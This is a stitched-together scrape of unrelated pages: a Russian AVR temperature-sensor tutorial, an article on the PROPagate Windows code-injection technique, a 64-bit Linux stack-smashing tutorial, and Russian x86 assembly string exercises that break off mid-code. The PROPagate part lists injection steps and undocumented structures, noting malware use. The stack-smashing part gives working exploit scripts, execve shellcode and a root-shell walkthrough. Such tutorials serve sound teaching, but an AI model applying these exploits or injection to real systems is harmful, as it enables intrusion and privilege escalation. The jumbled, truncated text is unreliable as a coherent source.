После этого преобразуем цифры в коды ASCII, чтобы данные можно было нормально прочитать в терминале, добавляем названия данных, ну там «температура» из флеша и шлем в COM порт в терминал.

PuTTY с данными

Для того, чтобы это измерять температуру регулярно добавляем вечный цикл с задержкой порядка 1200 миллисекунд, поскольку datasheet DHT11 говорит, что не рекомендуется опрашивать датчик чаще чем 1 раз в секунду.

Основной цикл после этого выглядит примерно так:

;============	MAIN
			;!!! Главный вход

			; Internal Hardware Init
			CLI		; нам прерывания не нужны пока
			; stack init		
			LDI Tmp1, Low(RAMEND)
			OUT SPL, Tmp1
			LDI Tmp1, High(RAMEND)
			OUT SPH, Tmp1


			; Init data
			RCALL COPY_STRINGS		; скопировали данные в RAM
			RCALL TEST_DATA			; подготовили тестовые данные

loop:				NOP						; крутимся в вечном цикле ....
				; External Hardware Init
				; получили здесь подтверждение контроллера и надо в темпе читать биты
				; критичная ко времени секция завершилась...
				;Тест - отправить Cycles в USART		
				; получаем из посылки биты
				;Тест - отправить BITS в USART
				; получаем из BITS цифровые данные
				;Тест - отправить 4 байта начиная с H10 в USART
				;RCALL TEST_H10_T01
				; подготовидли температуру и влажность в ASCII		
				; Отправить готовую температуру (надпись и ASCII данные) в USART
				; Отправить готовую влажность (надпись и ASCII данные) в USART
				; переведем строку дял красоты				
				RCALL DELAY_1200MS				;повторяем каждые 1.2 секунды 
				rjmp loop		; зациклились

Прошиваем, подключаем USB-TTL кабель (преобразователь)к компьютеру, запускаем терминал, выбираем правильный виртуальный COM порта и наслаждаемся нашим новым цифровым термометром. Для проверки можно погреть датчик в руке — у меня температура при этом растет, а влажность как ни странно уменьшается.

Ссылки по теме:
AVR Delay Calc
Как подключить Arduino для программирования в Atmel Studio 7
DHT11 Datasheet
ATmega DataSheet
Atmel AVR 8-bit Instruction Set
Atmel Studio
Код примера на github

New code injection trick named — PROPagate code injection technique

ROPagate code injection technique

@Hexacorn discussed in late 2017 a new code injection technique, which involves hooking existing callback functions in a Window subclass structure. Exploiting this legitimate functionality of windows for malicious purposes will not likely surprise some developers already familiar with hooking existing callback functions in a process. However, it’s still a relatively new technique for many to misuse for code injection, and we’ll likely see it used more and more in future.

For all the details on research conducted by Adam, I suggest the following posts.


PROPagate — a new code injection trick


Executing code inside a different process space is typically achieved via an injected DLL /system-wide hooks, sideloading, etc./, executing remote threads, APCs, intercepting and modifying the thread context of remote threads, etc. Then there is Gapz/Powerloader code injection (a.k.a. EWMI), AtomBombing, and mapping/unmapping trick with the NtClose patch.

There is one more.

Remember Shatter attacks?

I believe that Gapz trick was created as an attempt to bypass what has been mitigated by the User Interface Privilege Isolation (UIPI). Interestingly, there is actually more than one way to do it, and the trick that I am going to describe below is a much cleaner variant of it – it doesn’t even need any ROP.

There is a class of windows always present on the system that use window subclassing. Window subclassing is just a fancy name for hooking, because during the subclassing process an old window procedure is preserved while the new one is being assigned to the window. The new one then intercepts all the window messages, does whatever it has to do, and then calls the old one.

The ‘native’ window subclassing is done using the SetWindowSubclass API.

When a window is subclassed it gains a new property stored inside its internal structures and with a name depending on a version of comctl32.dll:

  • UxSubclassInfo – version 6.x
  • CC32SubclassInfo – version 5.x

Looking at properties of Windows Explorer child windows we can see that plenty of them use this particular subclassing property:

So do other Windows applications – pretty much any program that is leveraging standard windows controls can be of interest, including say… OllyDbg:When the SetWindowSubclass is called it is using SetProp API to set one of these two properties (UxSubclassInfo, or CC32SubclassInfo) to point to an area in memory where the old function pointer will be stored. When the new message routine is called, it will then call GetProp API for the given window and once its old procedure address is retrieved – it is executed.

Coming back for a moment to the aforementioned shattering attacks. We can’t use SetWindowLong or SetClassLong (or their newer SetWindowLongPtr and SetClassLongPtr alternatives) any longer to set the address of the window procedure for windows belonging to the other processes (via GWL_WNDPROC or GCL_WNDPROC). However, the SetProp function is not affected by this limitation. When it comes to the process at the lower of equal  integrity level the Microsoft documentation says:

SetProp is subject to the restrictions of User Interface Privilege Isolation (UIPI). A process can only call this function on a window belonging to a process of lesser or equal integrity level. When UIPI blocks property changes, GetLastError will return 5.

So, if we talk about other user applications in the same session – there is plenty of them and we can modify their windows’ properties freely!

I guess you know by now where it is heading:

  • We can freely modify the property of a window belonging to another process.
  • We also know some properties point to memory region that store an old address of a procedure of the subclassed window.
  • The routine that address points to will be at some stage executed.

All we need is a structure that UxSubclassInfo/CC32SubclassInfo properties are using. This is actually pretty easy – you can check what SetProp is doing for these subclassed windows. You will quickly realize that the old procedure is stored at the offset 0x14 from the beginning of that memory region (the structure is a bit more complex as it may contain a number of callbacks, but the first one is at 0x14).

So, injecting a small buffer into a target process, ensuring the expected structure is properly filled-in and and pointing to the payload and then changing the respective window property will ensure the payload is executed next time the message is received by the window (this can be enforced by sending a message).

When I discovered it, I wrote a quick & dirty POC that enumerates all windows with the aforementioned properties (there is lots of them so pretty much every GUI application is affected). For each subclassing property found I changed it to a random value – as a result Windows Explorer, Total Commander, Process Hacker, Ollydbg, and a few more applications crashed immediately. That was a good sign. I then created a very small shellcode that shows a Message Box on a desktop window and tested it on Windows 10 (under normal account).

The moment when the shellcode is being called in a first random target (here, Total Commander):

Of course, it also works in Windows Explorer, this is how it looks like when executed:

If we check with Process Explorer, we can see the window belongs to explorer.exe:Testing it on a good ol’ Windows XP and injecting the shellcode into Windows Explorer shows a nice cascade of executed shellcodes for each window exposing the subclassing property (in terms of special effects XP always beats Windows 10 – the latter freezes after first messagebox shows up; and in case you are wondering why it freezes – it’s because my shellcode is simple and once executed it is basically damaging the running application):

For obvious reasons I won’t be attaching the source code.

If you are an EDR or sandboxing vendor you should consider monitoring SetProp/SetWindowSubclass APIs as well as their NT alternatives and system services.


This is not the end. There are many other generic properties that can be potentially leveraged in a very same way:

  • The Microsoft Foundation Class Library (MFC) uses ‘AfxOldWndProc423’ property to subclass its windows
  • ControlOfs[HEX] – properties associated with Delphi applications reference in-memory Visual Component Library (VCL) objects
  • New windows framework e.g. Microsoft.Windows.WindowFactory.* needs more research
  • A number of custom controls use ‘subclass’ and I bet they can be modified in a similar way
  • Some properties expose COM/OLE Interfaces e.g. OleDropTargetInterface

If you are curious if it works between 32- and 64- bit processes



PROPagate follow-up — Some more Shattering Attack Potentials


We now know that one can use SetProp to execute a shellcode inside 32- and 64-bit applications as long as they use windows that are subclassed.


A new trick that allows to execute code in other processes without using remote threads, APC, etc. While describing it, I focused only on 32-bit architecture. One may wonder whether there is a way for it to work on 64-bit systems and even more interestingly – whether there is a possibility to inject/run code between 32- and 64- bit processes.

To test it, I checked my 32-bit code injector on a 64-bit box. It crashed my 64-bit Explorer.exe process in no time.

So, yes, we can change properties of windows belonging to 64-bit processes from a 32-bit process! And yes, you can swap the subclass properties I described previously to point to your injected buffer and eventually make the payload execute! The reason it works is that original property addresses are stored in lower 32-bit of the 64-bit offset. Replacing that lower 32-bit part of the offset to point to a newly allocated buffer (also in lower area of the memory, thanks to VirtualAllocEx) is enough to trigger the code execution.

See below the GetProp inside explorer.exe retrieving the subclassed property:

So, there you have it… 32 process injecting into 64-bit process and executing the payload w/o heaven’s gate or using other undocumented tricks.

The below is the moment the 64-bit shellcode is executed:

p.s. the structure of the subclassed callbacks is slightly different inside 64-bit processes due to 64-bit offsets, but again, I don’t want to make it any easier to bad guys than it should be 🙂


There are more possibilities.

While SetWindowLong/SetWindowLongPtr/SetClassLong/SetClassLongPtr are all protected and can be only used on windows belonging to the same process, the very old APIs SetWindowWord and SetClassWord … are not.

As usual, I tested it enumerating windows running a 32-bit application on a 64-bit system and setting properties to unpredictable values and observing what happens.

It turns out that again, pretty much all my Window applications crashed on Window 10. These 16 bits seem to be quite powerful…

I am not a vulnerability researcher, but I bet we can still do something interesting; I will continue poking around. The easy wins I see are similar to SetProp e.g. GWL_USERDATA may point to some virtual tables/pointers; the DWL_USER – as per Microsoft – ‘sets new extra information that is private to the application, such as handles or pointers’. Assuming that we may only modify 16 bit of e.g. some offset, redirecting it to some code cave or overwriting unused part of memory within close proximity of the original offset could allow for a successful exploit.



PROPagate follow-up #2 — Some more Shattering Attack Potentials


A few months back I discovered a new code injection technique that I named PROPagate. Using a subclass of a well-known shatter attack one can modify the callback function pointers inside other processes by using Windows APIs like SetProp, and potentially others. After pointing out a few ideas I put it on a back burner for a while, but I knew I will want to explore some more possibilities in the future.

In particular, I was curious what are the chances one could force the remote process to indirectly call the ‘prohibited’ functions like SetWindowLong, SetClassLong (or their newer alternatives SetWindowLongPtr and SetClassLongPtr), but with the arguments that we control (i.e. from a remote process). These API are ‘prohibited’ because they can only be called in a context of a process that owns them, so we can’t directly call them and target windows that belong to other processes.

It turns out his may be possible!

If there is one common way of using the SetWindowLong API it is to set up pointers, and/or filling-in window-specific memory areas (allocated per window instance) with some values that are initialized immediately after the window is created. The same thing happens when the window is destroyed – during the latter these memory areas are usually freed and set to zeroes, and callbacks are discarded.

These two actions are associated with two very specific window messages:


In fact, many ‘native’ windows kick off their existence by setting some callbacks in their message handling routines during processing of these two messages.

With that in mind, I started looking at existing processes and got some interesting findings. Here is a snippet of a routine I found inside Windows Explorer that could be potentially abused by a remote process:

Or, it’s disassembly equivalent (in response to WM_NCCREATE message):

So… since we can still freely send messages between windows it would seem that there is a lot of things that can be done here. One could send a specially crafted WM_NCCREATE message to a window that owns this routine and achieve a controlled code execution inside another process (the lParam needs to pass the checks and include pointer to memory area that includes a callback that will be executed afterwards – this callback could point to malicious code). I may be of course wrong, but need to explore it further when I find more time.

The other interesting thing I noticed is that some existing windows procedures are already written in a way that makes it harder to exploit this issue. They check if the window-specific data was set, and only if it was NOT they allow to call the SetWindowLong function. That is, they avoid executing the same initialization code twice.



No Proof of Concept?

Let’s be honest with ourselves, most of the “good” code injection techniques used by malware authors today are the brainchild of some expert(s) in the field of computer security. Take for example Process HollowingAtomBombing and the more recent Doppelganging technique.

On the likelihood of code being misused, Adam didn’t publish a PoC, but there’s still sufficient information available in the blog posts for a competent person to write their own proof of concept, and it’s only a matter of time before it’s used in the wild anyway.

Update: After publishing this, I discovered it’s currently being used by SmokeLoader but using a different approach to mine by using SetPropA/SetPropW to update the subclass procedure.

I’m not providing source code here either, but given the level of detail, it should be relatively easy to implement your own.

Steps to PROPagate.

  1. Enumerate all window handles and the properties associated with them using EnumProps/EnumPropsEx
  2. Use GetProp API to retrieve information about hWnd parameter passed to WinPropProc callback function. Use “UxSubclassInfo” or “CC32SubclassInfo” as the 2nd parameter.
    The first class is for systems since XP while the latter is for Windows 2000.
  3. Open the process that owns the subclass and read the structures that contain callback functions. Use GetWindowThreadProcessId to obtain process id for window handle.
  4. Write a payload into the remote process using the usual methods.
  5. Replace the subclass procedure with pointer to payload in memory.
  6. Write the structures back to remote process.

At this point, we can wait for user to trigger payload when they activate the process window, or trigger the payload via another API.

Subclass callback and structures

Microsoft was kind enough to document the subclass procedure, but unfortunately not the internal structures used to store information about a subclass, so you won’t find them on MSDN or even in sources for WINE or ReactOS.

   HWND      hWnd,
   UINT      uMsg,
   WPARAM    wParam,
   LPARAM    lParam,
   UINT_PTR  uIdSubclass,
   DWORD_PTR dwRefData);

Some clever searching by yours truly eventually led to the Windows 2000 source code, which was leaked online in 2004. Behold, the elusive undocumented structures found in subclass.c!

typedef struct _SUBCLASS_CALL {
  SUBCLASSPROC pfnSubclass;    // subclass procedure
  WPARAM       uIdSubclass;    // unique subclass identifier
  DWORD_PTR    dwRefData;      // optional ref data
typedef struct _SUBCLASS_FRAME {
  UINT    uCallIndex;   // index of next callback to call
  UINT    uDeepestCall; // deepest uCallIndex on stack
// previous subclass frame pointer
  struct _SUBCLASS_FRAME  *pFramePrev;
// header associated with this frame 
  struct _SUBCLASS_HEADER *pHeader;     
typedef struct _SUBCLASS_HEADER {
  UINT           uRefs;        // subclass count
  UINT           uAlloc;       // allocated subclass call nodes
  UINT           uCleanup;     // index of call node to clean up
  DWORD          dwThreadId; // thread id of window we are hooking
  SUBCLASS_FRAME *pFrameCur;   // current subclass frame pointer
  SUBCLASS_CALL  CallArray[1]; // base of packed call node array

At least now there’s no need to reverse engineer how Windows stores information about subclasses. Phew!

Finding suitable targets

I wrongly assumed many processes would be vulnerable to this injection method. I can confirm ollydbg and Process Hacker to be vulnerable as Adam mentions in his post, but I did not test other applications. As it happens, only explorer.exe seemed to be a viable target on a plain Windows 7 installation. Rather than search for an arbitrary process that contained a subclass callback, I decided for the purpose of demonstrations just to stick with explorer.exe.

The code first enumerates all properties for windows created by explorer.exe. An attempt is made to request information about “UxSubclassInfo”, which if successful will return an address pointer to subclass information in the remote process.

Figure 1. shows a list of subclasses associated with process id. I’m as perplexed as you might be about the fact some of these subclass addresses appear multiple times. I didn’t investigate.

Figure 1: Address of subclass information and process id for explorer.exe

Attaching a debugger to process id 5924 or explorer.exe and dumping the first address provides the SUBCLASS_HEADER contents. Figure 2 shows the data for header, with 2 hi-lighted values representing the callback functions.

Figure 2 : Dump of SUBCLASS_HEADER for address 0x003A1BE8

Disassembly of the pointer 0x7448F439 shows in Figure 3 the code is CallOriginalWndProc located in comctl32.dll

Figure 3 : Disassembly of callback function for SUBCLASS_CALL

Okay! So now we just read at least one subclass structure from a target process, change the callback address, and wait for explorer.exe to execute the payload. On the other hand, we could write our own SUBCLASS_HEADER to remote memory and update the existing subclass window with SetProp API.

To overwrite SUBCLASS_HEADER, all that’s required is to replace the pointer pfnSubclass with address of payload, and write the structure back to memory. Triggering it may be required unless someone is already using the operating system.

One would be wise to restore the original callback pointer in subclass header after payload has executed, in order to avoid explorer.exe crashing.

Update: Smoke Loader probably initializes its own SUBCLASS_HEADER before writing to remote process. I think either way is probably fine. The method I used didn’t call SetProp API.


The original author may have additional information on how to detect this injection method, however I think the following strings and API are likely sufficient to merit closer investigation of code.


  • UxSubclassInfo
  • CC32SubclassInfo
  • explorer.exe


  • OpenProcess
  • ReadProcessMemory
  • WriteProcessMemory
  • GetPropA/GetPropW
  • SetPropA/SetPropW


This injection method is trivial to implement, and because it affects many versions of Windows, I was surprised nobody published code to show how it worked. Nevertheless, it really is just a case of hooking callback functions in a remote process, and there are many more just like subclass. More to follow!

64-bit Linux stack smashing tutorial: Part 1

This series of tutorials is aimed as a quick introduction to exploiting buffer overflows on 64-bit Linux binaries. It’s geared primarily towards folks who are already familiar with exploiting 32-bit binaries and are wanting to apply their knowledge to exploiting 64-bit binaries. This tutorial is the result of compiling scattered notes I’ve collected over time into a cohesive whole.


Writing exploits for 64-bit Linux binaries isn’t too different from writing 32-bit exploits. There are however a few gotchas and I’ll be touching on those as we go along. The best way to learn this stuff is to do it, so I encourage you to follow along. I’ll be using Ubuntu 14.10 to compile the vulnerable binaries as well as to write the exploits. I’ll provide pre-compiled binaries as well in case you don’t want to compile them yourself. I’ll also be making use of the following tools for this particular tutorial:

64-bit, what you need to know

For the purpose of this tutorial, you should be aware of the following points:

  • General purpose registers have been expanded to 64-bit. So we now have RAX, RBX, RCX, RDX, RSI, and RDI.
  • Instruction pointer, base pointer, and stack pointer have also been expanded to 64-bit as RIP, RBP, and RSP respectively.
  • Additional registers have been provided: R8 to R15.
  • Pointers are 8-bytes wide.
  • Push/pop on the stack are 8-bytes wide.
  • Maximum canonical address size of 0x00007FFFFFFFFFFF.
  • Parameters to functions are passed through registers.

It’s always good to know more, so feel free to Google information on 64-bit architecture and assembly programming. Wikipedia has a nice short article that’s worth reading.

Classic stack smashing

Let’s begin with a classic stack smashing example. We’ll disable ASLR, NX, and stack canaries so we can focus on the actual exploitation. The source code for our vulnerable binary is as follows:

/* Compile: gcc -fno-stack-protector -z execstack classic.c -o classic */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space           */ 

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    return 0;

You can also grab the precompiled binary here.

There’s an obvious buffer overflow in the vuln() function when read() can copy up to 400 bytes into an 80 byte buffer. So technically if we pass 400 bytes in, we should overflow the buffer and overwrite RIP with our payload right? Let’s create an exploit containing the following:

#!/usr/bin/env python
buf = ""
buf += "A"*400

f = open("in.txt", "w")

This script will create a file called in.txt containing 400 “A”s. We’ll load classic into gdb and redirect the contents of in.txt into it and see if we can overwrite RIP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe508 ('A' <repeats 200 times>...)
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('A' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
0000| 0x7fffffffe508 ('A' <repeats 200 times>...)
0008| 0x7fffffffe510 ('A' <repeats 200 times>...)
0016| 0x7fffffffe518 ('A' <repeats 200 times>...)
0024| 0x7fffffffe520 ('A' <repeats 200 times>...)
0032| 0x7fffffffe528 ('A' <repeats 200 times>...)
0040| 0x7fffffffe530 ('A' <repeats 200 times>...)
0048| 0x7fffffffe538 ('A' <repeats 200 times>...)
0056| 0x7fffffffe540 ('A' <repeats 200 times>...)
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040060f in vuln ()

So the program crashed as expected, but not because we overwrote RIP with an invalid address. In fact we don’t control RIP at all. Recall as I mentioned earlier that the maximum address size is 0x00007FFFFFFFFFFF. We’re overwriting RIP with a non-canonical address of 0x4141414141414141 which causes the processor to raise an exception. In order to control RIP, we need to overwrite it with 0x0000414141414141 instead. So really the goal is to find the offset with which to overwrite RIP with a canonical address. We can use a cyclic pattern to find this offset:

gdb-peda$ pattern_create 400 in.txt
Writing pattern of 400 chars to filename "in.txt"

Let’s run it again and examine the contents of RSP:

gdb-peda$ r < in.txt
Try to exec /bin/sh
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RDI: 0x1
RBP: 0x416841414c414136 ('6AALAAhA')
RIP: 0x40060f (<vuln+73>:   ret)
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4147414131414162 ('bAA1AAGA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ("A%nA%SA%oA%TA%pA%UA%qA%VA%rA%WA%sA%XA%tA%YA%uA%Z|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
   0x400604 <vuln+62>:  call   0x400480 <puts@plt>
   0x400609 <vuln+67>:  mov    eax,0x0
   0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
   0x400610 <main>: push   rbp
   0x400611 <main+1>:   mov    rbp,rsp
   0x400614 <main+4>:   sub    rsp,0x10
   0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
0040| 0x7fffffffe530 ("RAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA"...)
0048| 0x7fffffffe538 ("AoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%R"...)
0056| 0x7fffffffe540 ("AAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%nA%SA%"...)

We can clearly see our cyclic pattern on the stack. Let’s find the offset:

gdb-peda$ x/wx $rsp
0x7fffffffe508: 0x41413741

gdb-peda$ pattern_offset 0x41413741
1094793025 found at offset: 104

So RIP is at offset 104. Let’s update our exploit and see if we can overwrite RIP this time:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104                      # offset to RIP
buf += pack("<Q", 0x424242424242)   # overwrite RIP with 0x0000424242424242
buf += "C"*290                      # padding to keep payload length at 400 bytes

f = open("in.txt", "w")

Run it to create an updated in.txt file, and then redirect it into the program within gdb:

gdb-peda$ r < in.txt
Try to exec /bin/sh
No shell for you :(

Program received signal SIGSEGV, Segmentation fault.
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7b015a0 (<__write_nocancel+7>:  cmp    rax,0xfffffffffffff001)
RDX: 0x7ffff7dd5a00 --> 0x0
RSI: 0x7ffff7ff5000 ("No shell for you :(\nis ", 'A' <repeats 92 times>"\220, \001\n")
RDI: 0x1
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7fffffffe510 ('C' <repeats 200 times>...)
RIP: 0x424242424242 ('BBBBBB')
R8 : 0x283a20756f792072 ('r you :(')
R9 : 0x4141414141414141 ('AAAAAAAA')
R10: 0x7fffffffe260 --> 0x0
R11: 0x246
R12: 0x4004d0 (<_start>:    xor    ebp,ebp)
R13: 0x7fffffffe600 ('C' <repeats 48 times>, "|\350\377\377\377\177")
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
Invalid $PC address: 0x424242424242
0000| 0x7fffffffe510 ('C' <repeats 200 times>...)
0008| 0x7fffffffe518 ('C' <repeats 200 times>...)
0016| 0x7fffffffe520 ('C' <repeats 200 times>...)
0024| 0x7fffffffe528 ('C' <repeats 200 times>...)
0032| 0x7fffffffe530 ('C' <repeats 200 times>...)
0040| 0x7fffffffe538 ('C' <repeats 200 times>...)
0048| 0x7fffffffe540 ('C' <repeats 200 times>...)
0056| 0x7fffffffe548 ('C' <repeats 200 times>...)
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000424242424242 in ?? ()

Excellent, we’ve gained control over RIP. Since this program is compiled without NX or stack canaries, we can write our shellcode directly on the stack and return to it. Let’s go ahead and finish it. I’ll be using a 27-byte shellcode that executes execve(“/bin/sh”) found here.

We’ll store the shellcode on the stack via an environment variable and find its address on the stack using getenvaddr:

koji@pwnbox:~/classic$ export PWN=`python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`

koji@pwnbox:~/classic$ ~/getenvaddr PWN ./classic
PWN will be at 0x7fffffffeefa

We’ll update our exploit to return to our shellcode at 0x7fffffffeefa:

#!/usr/bin/env python
from struct import *

buf = ""
buf += "A"*104
buf += pack("<Q", 0x7fffffffeefa)

f = open("in.txt", "w")

Make sure to change the ownership and permission of classic to SUID root so we can get our root shell:

koji@pwnbox:~/classic$ sudo chown root classic
koji@pwnbox:~/classic$ sudo chmod 4755 classic

And finally, we’ll update in.txt and pipe our payload into classic:

koji@pwnbox:~/classic$ python ./sploit.py
koji@pwnbox:~/classic$ (cat in.txt ; cat) | ./classic
Try to exec /bin/sh
No shell for you :(

We’ve got a root shell, so our exploit worked. The main gotcha here was that we needed to be mindful of the maximum address size, otherwise we wouldn’t have been able to gain control of RIP. This concludes part 1 of the tutorial.

Part 1 was pretty easy, so for part 2 we’ll be using the same binary, only this time it will be compiled with NX. This will prevent us from executing instructions on the stack, so we’ll be looking at using ret2libc to get a root shell.

Перевод чисел в двоичную форму (в виде строки)

Данная процедура конвертирует 16-битное слово в строку ASCIIZ, т.е. число 7 преобразовывается в строку 0000000000000111. Лидирующие нули включаются в строку. Строка ASCIIZ — это набор символов, завершающихся 0.

NmbrToBi$ proc ;POW36
;Входные данные: AX — смещение строки, BX — число, которое необходимо преобразовать
;Выходные данные: Строка ASCIIZ. Регистры не сохраняются.
mov DI,AX ;смещение строки
mov DX,8000h ;проверочное слово, 1 в позиции 15
mov CX,16 ;обрабатываем 16 бит
mov AL,48 ;символ ‘0’
test BX,DX ;бит равен 1?
jz NumberTo_B
inc AL ;символ ‘1’
stosb ;записываем в строку ‘1’ или ‘0’
shr DX,1 ;сдвигаем тестовый бит вправо
loop NumberTo_B0
mov [DI],DL ;завершаем строку 0
NmbrToBi$ endp

Процедура считывает строку с клавиатуры

KbdInput$ proc ;POW35
; Входные данные: смещение строки в AX
; Выходные данные: строка ASCIIZ, прочитанная с клавиатуры. Регистры не сохраняются.
mov DI,AX ;смещение строки
mov DX,AX ;смещение буфера
mov CX,255 ;максимальное количество читаемых символов
mov BX,0 ;файловый хэндл клавиатуры
mov AH,3Fh ;читаем из файла (фактически — с клавиатуры)
int 21h
jc Input$_error ;если ошибка
dec AX ;убираем символ RETURN
add DI,AX ;смещение байта, расположенного в конце строки
mov [DI],BL ;завершаем строку, записывая 0 в конец строки

Задание выполняется на Visual C++ 2003 — 2008 с использованием assembler вставок. В этом задании необходимо выполнить соответствующие преобразования над строкой или строками.

Задание выполняется на Visual C++ 2003 — 2008 с использованием
ассемблерных вставок. В этом задании необходимо выполнить соответствующие
преобразования над строкой или строками. Решение задачи необходимо оформить
в виде одной или несколько подпрограмм, содержащих ассемблерные вставки. Как
правило, в каждом задании по одной или двум входным строкам надо
получить выходную строку, удовлетворяющую определенным условиям, причем
под выходную строку необходимо выделить память и сделать это надо внутри
ассемблерной вставки. Кроме того, программа должна иметь «дружелюбный»
интерфейс (например, предлагать выполнить повторное тестирование). Ввод
данных из файла не требуется, хотя приветствуется. Ввод/вывод с
консоли выполнять с помощью функций printf и scanf, вызов которых
тоже должен происходить внутри ассемблерных вставок.
Указать те символы, которые есть и в первой и во второй строке.


void main()
const int N = 255;
char* res;
char* dys1 = «введите первую строку\n»;
char* dys2 = «\nвведите вторую строку\n»;
char* dys3 =»\nЕще? Enter — да, ESC — выход\n»;
char* err = «\nпамяти не дали»;
char* p = «pause»;
char* clear = «cls»;
char* ns = «Данные строки не имеют общих символов»;
char* str1;
char* str2;
// выделение памяти и считывание первой строки
BEGIN: ; главный цикл

mov eax,clear
push eax
call dword ptr system
add esp,4
mov eax,dys1 ;
push eax
call dword ptr printf ; вывели dys1
add esp,4 ; почистили стек

mov eax,N ; положили в eax размер строки
push eax ; положили размер в стек
call dword ptr malloc ; выделяем память под первую строку
add esp,4 ; чистим стек
cmp eax,0 ; проверяем, выделилась ли память
je MEMORY_ER ; В случае не выделения памяти сообщаем об ошибке
mov str1,eax ; если памяти дали, то записываем адрес первой строки
push eax ; опять положили в стек адрес первой строки
call dword ptr gets ; считали строку
add esp,4 ; почистили стек

mov eax,dys2
push eax
call dword ptr printf
add esp,4

mov eax,N ; положили в eax размер строки
push eax ; положили размер в стек
call dword ptr malloc ; выделяем память под вторую строку
add esp,4 ; чистим стек
cmp eax,0 ; проверяем, выделилась ли память
je MEMORY_ER ; В случае не выделения памяти сообщаем об ошибке
mov str2,eax ; если памяти дали, то записываем адрес первой строки
push eax ; опять положили в стек адрес первой строки
call dword ptr gets ; считали строку
add esp,4 ; почистили стек
mov edx,str2 ; запомнили адрес первой строки, чтоб лишний раз не лазить в память
mov ebx,str1 ; запомнили адрес первой строки, чтоб лишний раз не лазить в память
// в еbx — адрес первой строки
// в edx — адрес второй строки
// поиск
mov edx,str2 ; запомнили адрес первой строки, чтоб лишний раз не лазить в память
mov ebx,str1 ; запомнили адрес первой строки, чтоб лишний раз не лазить в память

xor eax,eax ; обнуляем eax
// теперь нам надо посчитать количество совпавших элементов
xor edi,edi ; в edi количество совпавших элементов

START: ; внешний цикл

xor esi,esi ; esi — текущий счетчик
mov cl,[ebx][eax] ; положили в cl первый символ первой строки
inc eax ; увеличили счетчик
cmp cl,0 ; проверка конца строки
je NEW_RES ; ушли на выделение памяти под результат

mov ch,[edx][esi] ; положили в ch следующий символ
cmp ch,0 ; проверка конца строки
je END ; ушли в обнуление текущего счетчика

cmp cl,ch ; сравнили символы
je FOUND ; если символы совпали — говорим нашли
inc esi ; увеличили текущий счетчик
jmp START2

jmp START ; возвращаемся в главный цикл

inc edi ; увеличили счетчик совпавших символов
jmp START ; ушли в главный цикл

cmp edi,0
inc edi ; увеличили размер результатата под 0 символ
push edi ; положили в eax размер результата
